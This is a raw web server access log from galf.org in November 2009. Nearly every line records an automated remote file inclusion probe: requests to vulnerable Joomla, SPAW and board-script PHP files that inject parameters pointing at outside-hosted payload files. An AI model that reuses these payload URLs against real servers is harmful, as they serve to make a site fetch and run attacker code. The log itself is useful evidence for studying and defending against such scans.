94.46.2.21 - - [08/Nov/2009:22:49:42 -0800] "GET /index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:49:42 -0800] "GET /logs//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:49:45 -0800] "GET /logs/access_091012.log//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:49:45 -0800] "GET /logs//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:49:45 -0800] "GET /index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.34 - - [08/Nov/2009:22:51:05 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=69&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.3.5.0; FunWebProducts; OptusNetDSL6; SV1; .NET CLR 1.0.3705; InfoPath.1)" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:06 -0800] "GET /logs/access.log//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:06 -0800] "GET /logs/access.log//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:11 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:11 -0800] "GET /logs/access.log%20%20//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:12 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:12 -0800] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:13 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:13 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:13 -0800] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:13 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:14 -0800] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:14 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:40 -0800] "GET /logs/access_090427.log//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:40 -0800] "GET /logs//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:41 -0800] "GET /index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:43 -0800] "GET /logs/access_090427.log//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:43 -0800] "GET /index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:44 -0800] "GET /logs//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [08/Nov/2009:22:51:48 -0800] "GET /logs/access_090629.log//paginedinamiche/main.php?pagina=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:55 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:55 -0800] "GET /logs/access_091012.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:55 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:58 -0800] "GET /logs/access.log%20%20//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:58 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:58 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:51:58 -0800] "GET /logs/access_091012.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:52:06 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:52:06 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:52:06 -0800] "GET /logs/access_091012.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:53:03 -0800] "GET /index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:53:03 -0800] "GET /logs//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:53:04 -0800] "GET /logs/access_091012.log//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:53:12 -0800] "GET /logs//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:53:12 -0800] "GET /index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:53:12 -0800] "GET /logs/access_091012.log//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [08/Nov/2009:22:53:38 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [08/Nov/2009:22:53:38 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [08/Nov/2009:22:53:38 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [08/Nov/2009:22:53:38 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [08/Nov/2009:22:53:38 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [08/Nov/2009:22:53:38 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:54:03 -0800] "GET /logs/access.log//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [08/Nov/2009:22:54:04 -0800] "GET /logs/access_090316.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [08/Nov/2009:22:54:11 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [08/Nov/2009:22:54:11 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [08/Nov/2009:22:54:11 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:54:18 -0800] "GET /logs/access.log//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [08/Nov/2009:22:54:29 -0800] "GET /logs/access_090316.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [08/Nov/2009:22:54:38 -0800] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.79.101.98 - - [08/Nov/2009:22:54:38 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.79.101.98 - - [08/Nov/2009:22:54:38 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.17 - - [08/Nov/2009:22:54:38 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:54:38 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:54:38 -0800] "GET /logs/access_091012.log/?_SERVER[DOCUMENT_ROOT]=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:54:40 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:54:41 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:54:41 -0800] "GET /logs/access_091012.log/?_SERVER[DOCUMENT_ROOT]=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:54:43 -0800] "GET /logs/access_091012.log/?_SERVER[DOCUMENT_ROOT]=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:54:43 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:54:43 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:22:54:51 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:22:54:51 -0800] "GET /logs/access_090406.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:22:54:51 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:22:54:59 -0800] "GET /logs/access_090810.log//administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:22:54:59 -0800] "GET /logs//administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:22:54:59 -0800] "GET /administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:55:07 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
77.221.130.17 - - [08/Nov/2009:22:55:07 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
77.221.130.17 - - [08/Nov/2009:22:55:07 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
77.221.130.17 - - [08/Nov/2009:22:55:11 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
77.221.130.17 - - [08/Nov/2009:22:55:11 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
77.221.130.17 - - [08/Nov/2009:22:55:11 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
77.221.130.17 - - [08/Nov/2009:22:55:13 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
77.221.130.17 - - [08/Nov/2009:22:55:13 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
77.221.130.17 - - [08/Nov/2009:22:55:13 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
213.79.101.98 - - [08/Nov/2009:22:55:34 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [08/Nov/2009:22:55:34 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [08/Nov/2009:22:55:34 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:55:41 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:55:41 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:55:41 -0800] "GET /logs/access_091012.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:22:55:49 -0800] "GET /logs/access_090420.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:55:59 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:55:59 -0800] "GET /logs/access_091012.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:56:00 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:56:01 -0800] "GET /logs/access_091012.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:56:01 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:56:01 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:22:56:05 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.27.203.107 - - [08/Nov/2009:22:56:05 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.27.203.107 - - [08/Nov/2009:22:56:05 -0800] "GET /logs/access.log%20%20//skin/ggambo7002_board/setup.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.90.16.57 - - [08/Nov/2009:22:56:08 -0800] "GET /logs/access_090720.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:22:56:08 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:22:56:08 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [08/Nov/2009:22:56:10 -0800] "GET /logs/access_090316.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:22:56:15 -0800] "GET /logs/access_090323.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:22:56:33 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:22:56:33 -0800] "GET /logs/access_090720.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:22:56:33 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [08/Nov/2009:22:56:38 -0800] "GET /logs/access_090323.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:22:57:06 -0800] "GET /logs/access_091012.log%20%20//skin/ggambo7002_board/setup.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:22:57:08 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:22:57:08 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
192.228.230.3 - - [08/Nov/2009:22:58:54 -0800] "GET /logs/access.log HTTP/1.1" 200 222818 "-" "Mozilla/8.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:23:01:26 -0800] "GET /logs/access_090810.log///?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:23:06:12 -0800] "GET /logs/access_091005.log//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:23:06:12 -0800] "GET /send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:23:06:12 -0800] "GET /logs//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:23:06:47 -0800] "GET /logs/access_090817.log//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:23:07:41 -0800] "GET /logs/access_091005.log%20%20//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:23:07:59 -0800] "GET /logs/access_090817.log%20%20//send_reminders.php//bbs//skin/ggambo7002_board/write.php?dir=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
